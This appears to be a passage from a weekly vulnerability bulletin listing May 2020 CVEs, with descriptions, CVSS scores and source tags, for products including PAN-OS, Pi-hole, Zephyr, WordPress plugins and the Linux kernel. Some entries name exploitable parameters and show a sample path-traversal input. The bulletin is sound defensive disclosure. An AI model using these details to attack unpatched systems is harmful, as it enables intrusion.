MISC
MLIST palo_alto_networks -- pan-os
  An authentication bypass vulnerability in Palo Alto Networks PAN-OS Panorama proxy service allows an unauthenticated user with network access to Panorama and the knowledge of the Firewall’s serial number to register the PAN-OS firewall. After the PAN-OS device is registered, the user can further compromise the PAN-OS instances managed by Panorama. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.0 versions earlier than 8.0.21; PAN-OS 8.1 versions earlier than 8.1.12; PAN-OS 9.0 versions earlier than 9.0.6. 2020-05-13 9.3 CVE-2020-2018
CONFIRM palo_alto_networks -- pan-os
  An external control of path and data vulnerability in the Palo Alto Networks PAN-OS Panorama XSLT processing logic allows an unauthenticated user with network access to the PAN-OS management interface to write an attacker-supplied file on the system and elevate privileges. This issue affects: All PAN-OS 7.1 Panorama and 8.0 Panorama versions; PAN-OS 8.1 versions earlier than 8.1.12 on Panorama; PAN-OS 9.0 versions earlier than 9.0.6 on Panorama. 2020-05-13 7.5 CVE-2020-2001
CONFIRM palo_alto_networks -- pan-os
  An OS command injection vulnerability in PAN-OS management interface allows an authenticated administrator to execute arbitrary OS commands with root privileges. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.7. 2020-05-13 9 CVE-2020-2010
CONFIRM palo_alto_networks -- pan-os
  An external control of filename vulnerability in the SD WAN component of Palo Alto Networks PAN-OS Panorama allows an authenticated administrator to send a request that results in the creation and write of an arbitrary file on all firewalls managed by the Panorama. In some cases this results in arbitrary code execution with root permissions. This issue affects: All versions of PAN-OS 7.1; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.7. 2020-05-13 9 CVE-2020-2009
CONFIRM palo_alto_networks -- pan-os
  An improper input validation vulnerability in the configuration daemon of Palo Alto Networks PAN-OS Panorama allows for a remote unauthenticated user to send a specifically crafted registration request to the device that causes the configuration service to crash. Repeated attempts to send this request result in denial of service to all PAN-OS Panorama services by restarting the device and putting it into maintenance mode. This issue affects: All versions of PAN-OS 7.1, PAN-OS 8.0; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.7; PAN-OS 9.1 versions earlier than 9.1.0. 2020-05-13 7.8 CVE-2020-2011
CONFIRM palo_alto_networks -- pan-os
  An OS Command Injection vulnerability in PAN-OS management server allows authenticated users to inject and execute arbitrary shell commands with root privileges. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.7. 2020-05-13 9 CVE-2020-2014
CONFIRM palo_alto_networks -- pan-os
  A stack-based buffer overflow vulnerability in the management server component of PAN-OS allows an authenticated user to potentially execute arbitrary code with root privileges. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.14. 2020-05-13 9 CVE-2020-2006
CONFIRM palo_alto_networks -- pan-os
  An OS command injection vulnerability in the management server component of PAN-OS allows an authenticated user to potentially execute arbitrary commands with root privileges. This issue affects: All PAN-OS 7.1 versions; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.7. 2020-05-13 9 CVE-2020-2007
CONFIRM palo_alto_networks -- pan-os
  An OS command injection and external control of filename vulnerability in Palo Alto Networks PAN-OS allows authenticated administrators to execute code with root privileges or delete arbitrary system files and impact the system's integrity or cause a denial of service condition. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.14. 2020-05-13 9 CVE-2020-2008
CONFIRM palo_alto_networks -- pan-os
  A race condition due to insecure creation of a file in a temporary directory vulnerability in PAN-OS allows for root privilege escalation from a limited linux user account. This allows an attacker who has escaped the restricted shell as a low privilege administrator, possibly by exploiting another vulnerability, to escalate privileges to become root user. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.6; All versions of PAN-OS 8.0. 2020-05-13 8.5 CVE-2020-2016
CONFIRM palo_alto_networks -- pan-os
  An external control of filename vulnerability in the command processing of PAN-OS allows an authenticated administrator to delete arbitrary system files affecting the integrity of the system or causing denial of service to all PAN-OS services. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions before 8.1.14; PAN-OS 9.0 versions before 9.0.7; PAN-OS 9.1 versions before 9.1.1. 2020-05-13 8.5 CVE-2020-2003
CONFIRM palo_alto_networks -- pan-os
  A buffer overflow vulnerability in the PAN-OS management server allows authenticated users to crash system processes or potentially execute arbitrary code with root privileges. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.7; PAN-OS 9.1 versions earlier than 9.1.1; All versions of PAN-OS 8.0. 2020-05-13 9 CVE-2020-2015
CONFIRM pi-hole -- pi-hole
  The Gravity updater in Pi-hole through 4.4 allows an authenticated adversary to upload arbitrary files. This can be abused for Remote Code Execution by writing to a PHP file in the web directory. (Also, it can be used in conjunction with the sudo rule for the www-data user to escalate privileges to root.) The code error is in gravity_DownloadBlocklistFromUrl in gravity.sh. 2020-05-11 9 CVE-2020-11108
MISC
MISC
MISC
MISC ping_identity -- pingid_ssh
  Ping Identity PingID SSH before 4.0.14 contains a heap buffer overflow in PingID-enrolled servers. This condition can be potentially exploited into a Remote Code Execution vector on the authenticating endpoint. 2020-05-13 7.5 CVE-2020-10654
CONFIRM
MISC
MISC
MISC samsung -- multiple_mobile_devices
  An issue was discovered on Samsung mobile devices with O(8.X), P(9.0), and Q(10.0) (Exynos chipsets) software. Attackers can bypass the Secure Bootloader protection mechanism via a heap-based buffer overflow to execute arbitrary code. The Samsung ID is SVE-2020-16712 (May 2020). 2020-05-11 10 CVE-2020-12746
CONFIRM samsung -- multiple_mobile_devices
  An issue was discovered on Samsung mobile devices with Q(10.0) (Exynos980 9630 and Exynos990 9830 chipsets) software. The Bootloader has a heap-based buffer overflow because of the mishandling of specific commands. The Samsung IDs are SVE-2020-16981, SVE-2020-16991 (May 2020). 2020-05-11 7.5 CVE-2020-12747
CONFIRM sap -- business_objects_business_intelligence_platform
  SAP Business Objects Business Intelligence Platform (Live Data Connect), versions 1.0, 2.0, 2.x, allows an attacker to log on to the Central Management Console without a password if the BIPRWS application server was not protected with some specific certificate, leading to Missing Authentication Check. 2020-05-12 7.5 CVE-2020-6242
MISC
MISC trendnet -- proview_wireless_camera_tv-ip512wn
  TRENDnet ProView Wireless camera TV-IP512WN 1.0R 1.0.4 is vulnerable to an unauthenticated stack-based buffer overflow in handling RTSP packets. This may result in remote code execution or denial of service. The issue is in the binary rtspd (in /sbin) when parsing a long "Authorization: Basic" RTSP header. 2020-05-13 7.5 CVE-2020-12763
MISC vbulletin -- vbulletin
  vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control. 2020-05-08 7.5 CVE-2020-12720
MISC
MISC veritas -- aptare
  Veritas APTARE versions prior to 10.4 included code that bypassed the normal login process when specific authentication credentials were provided to the server. 2020-05-14 7.5 CVE-2020-12874
MISC wordpress -- wordpress
  A blind SQL injection vulnerability is present in Chop Slider 3, a WordPress plugin. The vulnerability is introduced in the id GET parameter supplied to get_script/index.php, and allows an attacker to execute arbitrary SQL queries in the context of the WP database user. 2020-05-08 7.5 CVE-2020-11530
MISC
MISC
FULLDISC
MISC
MISC wordpress -- wordpress
  The simple-file-list plugin before 4.2.8 for WordPress mishandles a .. sequence within a pathname in cases where front-side file management occurs on a non-Linux platform. 2020-05-13 7.5 CVE-2020-12832
MISC
MISC zephyrproject -- zephyr
  A malformed JSON payload that is received from an UpdateHub server may trigger memory corruption in the Zephyr OS. This could result in a denial of service in the best case, or code execution in the worst case. See NCC-NCC-016. This issue affects: zephyrproject-rtos zephyr version 2.1.0 and later versions; version 2.2.0 and later versions. 2020-05-11 7.5 CVE-2020-10022
MISC
MISC
MISC
MISC
MISC zephyrproject -- zephyr
  The arm platform-specific code uses a signed integer comparison when validating system call numbers. An attacker who has obtained code execution within a user thread is able to elevate privileges to that of the kernel. See NCC-ZEP-001. This issue affects: zephyrproject-rtos zephyr version 1.14.0 and later versions; version 2.1.0 and later versions. 2020-05-11 7.2 CVE-2020-10024
MISC
MISC
MISC
MISC
MISC zephyrproject -- zephyr
  An attacker who has obtained code execution within a user thread is able to elevate privileges to that of the kernel. See NCC-ZEP-001. This issue affects: zephyrproject-rtos zephyr version 1.14.0 and later versions; version 2.1.0 and later versions. 2020-05-11 7.2 CVE-2020-10027
MISC
MISC
MISC
MISC
MISC zephyrproject -- zephyr
  A malicious userspace application can cause an integer overflow and bypass security checks performed by system call handlers. The impact would depend on the underlying system call and can range from denial of service to information leak to memory corruption resulting in code execution within the kernel. See NCC-ZEP-005. This issue affects: zephyrproject-rtos zephyr version 1.14.1 and later versions; version 2.1.0 and later versions. 2020-05-11 7.2 CVE-2020-10067
MISC
MISC
MISC
MISC
MISC zoho -- manageengine_datasecurity_plus
  Zoho ManageEngine DataSecurity Plus prior to 6.0.1 uses default admin credentials to communicate with a DataEngine Xnode server. This allows an attacker to bypass authentication for this server and execute all operations in the context of admin user. 2020-05-08 10 CVE-2020-11532
MISC
MISC zulip -- zulip_desktop
  Zulip Desktop before 5.2.0 has Missing SSL Certificate Validation because all validation was inadvertently disabled during an attempt to recognize the ignoreCerts option. 2020-05-09 7.5 CVE-2020-12637
CONFIRM

 

Medium Vulnerabilities

Columns: Primary Vendor -- Product; Description; Published; CVSS Score; Source & Patch Info

advantech -- webaccess/scada
  Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. An out-of-bounds vulnerability exists that may allow access to unauthorized data. 2020-05-08 5 CVE-2020-12018
MISC
MISC advantech -- webaccess/scada Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Input is not properly sanitized and may allow an attacker to inject SQL commands. 2020-05-08 5 CVE-2020-12014
MISC
MISC advantech -- webaccess/scada
  Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow an authenticated user to use a specially crafted file to delete files outside the application’s control. 2020-05-08 5.8 CVE-2020-12010
MISC advantech -- webaccess/scada
  Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow a low privilege user to overwrite files outside the application’s control. 2020-05-08 6.5 CVE-2020-12026
MISC
MISC apache -- activemq
  In Apache ActiveMQ 5.0.0 to 5.15.11, the webconsole admin GUI is open to XSS, in the view that lists the contents of a queue. 2020-05-14 4.3 CVE-2020-1941
MISC apache -- rocketmq
  In Apache RocketMQ 4.2.0 to 4.6.0, when automatic topic creation in the broker is turned on by default and an evil topic like “../../../../topic2020” is sent from rocketmq-client to the broker, a topic folder is created in the parent directory in brokers, which leads to a directory traversal vulnerability. Users of the affected versions should upgrade to Apache RocketMQ 4.6.1 or later. 2020-05-14 5 CVE-2019-17572
MISC
MISC apple -- swiftnio_extras In SwiftNIO Extras before 1.4.1, a logic issue was addressed with improved restrictions. 2020-05-11 5 CVE-2020-9840
MISC appneta -- tcpreplay
  tcprewrite in Tcpreplay through 4.3.2 has a heap-based buffer over-read during a get_c operation. The issue is being triggered in the function get_ipv6_next() at common/get.c. 2020-05-08 6.4 CVE-2020-12740
MISC autoswitch_python_virtualenv -- autoswitch_python_virtualenv In Autoswitch Python Virtualenv before version 0.16.0, a user who enters a directory with a malicious `.venv` file could run arbitrary code without any user interaction. This is fixed in version 1.16.0. 2020-05-13 4.6 CVE-2020-11073
MISC
MISC
MISC
CONFIRM cpanel -- cpanel cPanel before 86.0.14 allows remote attackers to trigger a bandwidth suspension via mail log strings (SEC-505). 2020-05-11 5 CVE-2020-12784
CONFIRM
MISC cpanel -- cpanel
  cPanel before 86.0.14 allows attackers to obtain access to the current working directory via the account backup feature (SEC-540). 2020-05-11 5.5 CVE-2020-12785
CONFIRM
MISC debian -- libemf
  libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows denial of service (issue 1 of 2). 2020-05-11 5 CVE-2020-11863
MISC
MISC
MISC debian -- libemf
  libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows denial of service (issue 2 of 2). 2020-05-11 5 CVE-2020-11864
MISC
MISC
MISC enlightenment -- imlib2 modules/loaders/loader_ico.c in imlib2 1.6.0 has an integer overflow (with resultant invalid memory allocations and out-of-bounds reads) via an icon with many colors in its color map. 2020-05-09 6.4 CVE-2020-12761
CONFIRM exim -- exim
  Exim through 4.93 has an out-of-bounds read in the SPA authenticator that could result in SPA/NTLM authentication bypass in auths/spa.c and auths/auth-spa.c. 2020-05-11 5 CVE-2020-12783
CONFIRM
CONFIRM
CONFIRM
DEBIAN f5 -- big-ip
  In versions 7.1.5-7.1.9, there is a use-after-free memory vulnerability in the BIG-IP Edge Client Windows ActiveX component. 2020-05-12 6.8 CVE-2020-5897
MISC f5 -- big-ip_edge_client
  On versions 7.1.5-7.1.9, the BIG-IP Edge Client's Windows Installer Service's temporary folder has weak file and folder permissions. 2020-05-12 4.6 CVE-2020-5896
MISC f5 -- big-ip_edge_client_windows_stonewall
  In versions 7.1.5-7.1.9, BIG-IP Edge Client Windows Stonewall driver does not sanitize the pointer received from the userland. A local user on the Windows client system can send crafted DeviceIoControl requests to \\.\urvpndrv device causing the Windows kernel to crash. 2020-05-12 4.9 CVE-2020-5898
MISC freebsd -- freebsd
  In FreeBSD 12.1-STABLE before r352509, 11.3-STABLE before r352509, and 11.3-RELEASE before p9, an unprivileged local user can trigger a use-after-free situation due to improper checking in SCTP when an application tries to update an SCTP-AUTH shared key. 2020-05-13 4.6 CVE-2019-15878
MISC
CONFIRM freebsd -- freebsd
  In FreeBSD 12.1-STABLE before r356908, 12.1-RELEASE before p5, 11.3-STABLE before r356908, and 11.3-RELEASE before p9, a race condition in the cryptodev module permitted a data structure in the kernel to be used after it was freed, allowing an unprivileged process to overwrite arbitrary kernel memory. 2020-05-13 5.8 CVE-2019-15879
MISC
CONFIRM freebsd -- freebsd
  In FreeBSD 12.1-STABLE before r360973, 12.1-RELEASE before p5, 11.4-STABLE before r360973, 11.4-BETA1 before p1 and 11.3-RELEASE before p9, the FTP packet handler in libalias incorrectly calculates some packet length allowing disclosure of small amounts of kernel (for kernel NAT) or natd process space (for userspace natd). 2020-05-13 5 CVE-2020-7455
MISC
CONFIRM freerdp -- freerdp
  libfreerdp/core/update.c in FreeRDP versions > 1.1 through 2.0.0-rc4 has an Out-of-bounds Read. 2020-05-15 6.4 CVE-2020-11526
MISC
CONFIRM
CONFIRM freerdp -- freerdp
  libfreerdp/gdi/gdi.c in FreeRDP > 1.0 through 2.0.0-rc4 has an Out-of-bounds Read. 2020-05-15 6.4 CVE-2020-11522
MISC
CONFIRM
CONFIRM glpi_project -- glpi
  GLPI before version 9.4.6 has a vulnerability involving a default encryption key. GLPIKEY is public and is used on every instance. This means anyone can decrypt sensitive data stored using this key. It is possible to change the key before installing GLPI. But on existing instances, data must be reencrypted with the new key. The problem is that we cannot know which columns or rows in the database are using that key, especially from plugins. Changing the key without updating data would result in a bad password being sent from GLPI, but storing them again from the UI will work. 2020-05-12 5 CVE-2020-5248
MISC
CONFIRM gnome -- libcroco
  libcroco through 0.6.13 has excessive recursion in cr_parser_parse_any_core in cr-parser.c, leading to stack consumption. 2020-05-12 6.8 CVE-2020-12825
MISC gnuteca -- gnuteca
  Gnuteca 3.8 allows file.php?folder=/&file= Directory Traversal. 2020-05-09 5 CVE-2020-12764
CONFIRM google -- android
  In GattServer::SendResponse of gatt_server.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9 Android-10. Android ID: A-143231677 2020-05-14 4.6 CVE-2020-0102
MISC google -- android
  In crus_afe_callback of msm-cirrus-playback.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-139739561 2020-05-14 4.6 CVE-2020-0220
MISC google -- android
  In onKeyguardVisibilityChanged of key_store_service.cpp, there is a missing permission check. This could lead to local escalation of privilege, allowing apps to use keyguard-bound keys when the screen is locked, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9 Android-10. Android ID: A-144285084 2020-05-14 4.6 CVE-2020-0105
MISC google -- android
  In simulatePackageSuspendBroadcast of NotificationManagerService.java, there is a missing permission check. This could lead to local escalation of privilege by creating fake system notifications with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9 Android-10. Android ID: A-148059175 2020-05-14 4.6 CVE-2020-0109
MISC google -- android
  In psi_write of psi.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-148159562. References: Upstream kernel 2020-05-14 4.6 CVE-2020-0110
MISC google -- android
  In navigateUpToLocked of ActivityStack.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10 Android-8.0 Android-8.1 Android-9. Android ID: A-144285917 2020-05-14 4.6 CVE-2020-0098
MISC ibm -- api_connect
  IBM API Connect's V2018.4.1.0 through 2018.4.1.10 management server has an unsecured API which can be exploited by an unauthenticated attacker to obtain sensitive information. IBM X-Force ID: 178322. 2020-05-12 5 CVE-2020-4346
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analysis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175637. 2020-05-14 6.9 CVE-2020-4258
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analysis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175635. 2020-05-14 6.9 CVE-2020-4257
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analysis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175647. 2020-05-14 6.9 CVE-2020-4264
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analysis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175645. 2020-05-14 6.9 CVE-2020-4262
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analysis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175648. 2020-05-14 6.9 CVE-2020-4265
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analysis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175646. 2020-05-14 6.9 CVE-2020-4263
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analysis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175644. 2020-05-14 6.9 CVE-2020-4261
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analysis Platform 9.2.1 could allow a local attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially-crafted file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 175649. 2020-05-14 6.9 CVE-2020-4266
XF
CONFIRM ibm -- maximo_asset_management
  IBM Maximo Asset Management 7.6.0, and 7.6.1 could allow an authenticated user to obtain highly sensitive information that they should not normally have access to. IBM X-Force ID: 163998. 2020-05-12 4 CVE-2019-4478
XF
CONFIRM ibm -- sterling_b2b_integrator_standard_edition
  IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.0.3.1 could allow an authenticated user to obtain sensitive information from a cached web page. IBM X-Force ID: 177089. 2020-05-13 4 CVE-2020-4312
XF
CONFIRM ibm -- sterling_b2b_integrator_standard_edition
  IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.0.3.1 could expose sensitive information to a user through a specially crafted HTTP request. IBM X-Force ID: 176606. 2020-05-14 4 CVE-2020-4299
XF
CONFIRM ibm -- sterling_file_gateway
  IBM Sterling File Gateway 2.2.0.0 through 6.0.3.1 could allow an authenticated user to manipulate cookie information and remove or add modules from the cookie to access functionality they are not authorized to use. IBM X-Force ID: 175638. 2020-05-14 4 CVE-2020-4259
XF
CONFIRM ibm -- urbancode_deploy
  IBM UrbanCode Deploy (UCD) 7.0.5.2 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 171249. 2020-05-11 4.3 CVE-2019-4667
XF
CONFIRM ibm -- websphere_application_server
  IBM WebSphere Application Server 8.5 is vulnerable to server-side request forgery. By sending a specially crafted request, a remote authenticated attacker could exploit this vulnerability to obtain sensitive data. IBM X-Force ID: 178964. 2020-05-14 4 CVE-2020-4365
XF
CONFIRM ispyconnect -- agent_dvr
  iSpyConnect.com Agent DVR before 2.7.1.0 allows directory traversal. 2020-05-15 5 CVE-2020-13093
MISC jooby -- jooby
  All versions before 1.6.7 and all versions after 2.0.0 inclusive and before 2.8.2 of io.jooby:jooby and org.jooby:jooby are vulnerable to Directory Traversal via two separate vectors. 2020-05-11 5 CVE-2020-7647
MISC
MISC
MISC json-c -- json-c
  json-c through 0.14 has an integer overflow and out-of-bounds write via a large JSON file, as demonstrated by printbuf_memappend. 2020-05-09 6.8 CVE-2020-12762
CONFIRM
MISC
FEDORA lg -- multiple_mobile_devices
  An issue was discovered on LG mobile devices with Android OS 7.2, 8.0, 8.1, 9, and 10 software. A crafted application can obtain control of device input via the window system service. The LG ID is LVE-SMP-170011 (May 2020). 2020-05-11 6.8 CVE-2020-12754
CONFIRM libreswan_project -- libreswan
  An out-of-bounds buffer read flaw was found in the pluto daemon of libreswan from versions 3.27 till 3.31, where an unauthenticated attacker could use this flaw to crash libreswan by sending specially-crafted IKEv1 Informational Exchange packets. The daemon respawns after the crash. 2020-05-12 5 CVE-2020-1763
MISC
CONFIRM
CONFIRM
CONFIRM
DEBIAN

linux -- linux_kernel

An issue was discovered in the Linux kernel before 5.4.17. drivers/spi/spi-dw.c allows attackers to cause a panic via concurrent calls to dw_spi_irq and dw_spi_transfer_one, aka CID-19b61392c5a8. 2020-05-09 4.9 CVE-2020-12769
CONFIRM
CONFIRM
CONFIRM linux -- linux_kernel
  An issue was discovered in the Linux kernel through 5.6.11. btree_gc_coalesce in drivers/md/bcache/btree.c has a deadlock if a coalescing operation fails. 2020-05-09 4.9 CVE-2020-12771
CONFIRM linux -- linux_kernel
  A signal access-control issue was discovered in the Linux kernel before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in include/linux/sched.h is only 32 bits, an integer overflow can interfere with a do_notify_parent protection mechanism. A child process can send an arbitrary signal to a parent process in a different security domain. Exploitation limitations include the amount of elapsed time before an integer overflow occurs, and the lack of scenarios where signals to a parent process present a substantial operational threat. 2020-05-12 6.9 CVE-2020-12826
CONFIRM
MISC
MISC
MISC
MISC linux -- linux_kernel
  An issue was discovered in the Linux kernel through 5.6.11. sg_write lacks an sg_remove_request call in a certain failure case, aka CID-83c6f2390040. 2020-05-09 4.6 CVE-2020-12770
CONFIRM
FEDORA
CONFIRM linux -- linux_kernel
  There is a use-after-free in kernel versions before 5.5 due to a race condition between the release of ptp_clock and cdev during resource deallocation. A (high privileged) process allocates a ptp device file (like /dev/ptpX) and voluntarily goes to sleep. If the underlying device is removed during this time, it can cause an exploitable condition as the process wakes up to terminate and clean all attached files. The system crashes due to the cdev structure being invalid (as already freed) which is pointed to by the inode. 2020-05-08 4.4 CVE-2020-10690
CONFIRM linux -- linux_kernel
  The fix for CVE-2019-11599, affecting the Linux kernel before 5.0.10 was not complete. A local user could use this flaw to obtain sensitive information, cause a denial of service, or possibly have other unspecified impacts by triggering a race condition with mmget_not_zero or get_task_mm calls. 2020-05-08 6.9 CVE-2019-14898
MISC
CONFIRM
MISC
MISC
MISC linux -- linux_kernel
  An issue was discovered in the Linux kernel 4.18 through 5.6.11 when unprivileged user namespaces are allowed. A user can create their own PID namespace, and mount a FUSE filesystem. Upon interaction with this FUSE filesystem, if the userspace component is terminated via a kill of the PID namespace's pid 1, it will result in a hung task, and resources being permanently locked up until system reboot. This can result in resource exhaustion. 2020-05-09 4.9 CVE-2019-20794
CONFIRM
CONFIRM maxum_development_corporation -- rumpus
  An issue was discovered in Maxum Rumpus before 8.2.12 on macOS. Authenticated users can perform a path traversal using double escaped characters, enabling read access to arbitrary files on the server. 2020-05-08 4 CVE-2020-12737
MISC
MISC mcafee -- active_response_for_linux
  Privilege Escalation vulnerability in McAfee Active Response (MAR) for Linux prior to 2.4.3 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to. 2020-05-08 4.6 CVE-2020-7290
CONFIRM mcafee -- active_response_for_mac
  Privilege Escalation vulnerability in McAfee Active Response (MAR) for Mac prior to 2.4.3 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to. 2020-05-08 4.6 CVE-2020-7291
CONFIRM mcafee -- active_response_for_windows
  Privilege Escalation vulnerability in McAfee Active Response (MAR) for Windows prior to 2.4.3 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to. 2020-05-08 4.6 CVE-2020-7289
CONFIRM mcafee -- exploit_detection_and_response
  Privilege Escalation vulnerability in McAfee Exploit Detection and Response (EDR) for Mac prior to 3.1.0 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to. 2020-05-08 4.6 CVE-2020-7288
CONFIRM mcafee -- exploit_detection_and_response
  Privilege Escalation vulnerability in McAfee Exploit Detection and Response (EDR) for Windows prior to 3.1.0 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to. 2020-05-08 4.6 CVE-2020-7286
CONFIRM mcafee -- exploit_detection_and_response
  Privilege Escalation vulnerability in McAfee Exploit Detection and Response (EDR) for Linux prior to 3.1.0 Hotfix 1 allows a malicious script or program to perform functions that the local executing user has not been granted access to. 2020-05-08 4.6 CVE-2020-7287
CONFIRM mcafee -- mvision_endpoint
  Privilege Escalation vulnerability in McAfee MVISION Endpoint prior to 20.5.0.94 allows a malicious script or program to perform functions that the local executing user has not been granted access to. 2020-05-08 4.6 CVE-2020-7285
CONFIRM

netapp -- service_processor_and_baseboard_management_controller

Certain versions of the NetApp Service Processor and Baseboard Management Controller firmware allow a remote unauthenticated attacker to cause a Denial of Service (DoS). 2020-05-11 5 CVE-2019-5500
MISC nextcloud -- nextcloud_groupfolders
  Improper access control in Groupfolders app 4.0.3 allowed deletion of hidden directories when renaming an accessible item to the same name. 2020-05-12 5.5 CVE-2020-8153
MISC
MISC nextcloud -- nextcloud_mail
  A missing verification of the TLS host in Nextcloud Mail 1.1.3 allowed a man in the middle attack. 2020-05-12 6.8 CVE-2020-8156
MISC nextcloud -- nextcloud_server
  An Insecure direct object reference vulnerability in Nextcloud Server 18.0.2 allowed an attacker to remote wipe devices of other users when sending a malicious request directly to the endpoint. 2020-05-12 6.8 CVE-2020-8154
SUSE
SUSE
MISC
MISC opennms -- horizon_and_meridian
  An issue was discovered in OpenNMS Horizon before 26.0.1, and Meridian before 2018.1.19 and 2019 before 2019.1.7. The ActiveMQ channel configuration allowed for arbitrary deserialization of Java objects (aka ActiveMQ Minion payload deserialization), leading to remote code execution for any authenticated channel user regardless of its assigned permissions. 2020-05-11 6.5 CVE-2020-12760
MISC
MISC
MISC
MISC
MISC opto_22 -- softpac_project
  Opto 22 SoftPAC Project Version 9.6 and prior. SoftPACAgent communicates with SoftPACMonitor over network Port 22000. However, this port is open without any restrictions. This allows an attacker with network access to control the SoftPACAgent service including updating SoftPAC firmware, starting or stopping service, or writing to certain registry values. 2020-05-14 6.4 CVE-2020-10612
MISC opto_22 -- softpac_project
  Opto 22 SoftPAC Project Version 9.6 and prior. Paths specified within the zip files used to update the SoftPAC firmware are not sanitized. As a result, an attacker with user privileges can gain arbitrary file write access with system access. 2020-05-14 4 CVE-2020-12042
MISC opto_22 -- softpac_project
  Opto 22 SoftPAC Project Version 9.6 and prior. SoftPAC does not specify the path of multiple imported .dll files. Therefore, an attacker can replace them and execute code whenever the service starts. 2020-05-14 6.8 CVE-2020-10616
MISC oracle -- iplanet_web_server
  ** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** Oracle iPlanet Web Server 7.0.x allows image injection in the Administration console via the productNameSrc parameter to an admingui URI. This issue exists because of an incomplete fix for CVE-2012-0516. NOTE: a related support policy can be found in the www.oracle.com references attached to this CVE. 2020-05-10 4.9 CVE-2020-9314
FULLDISC
MISC
MISC
MISC oracle -- iplanet_web_server
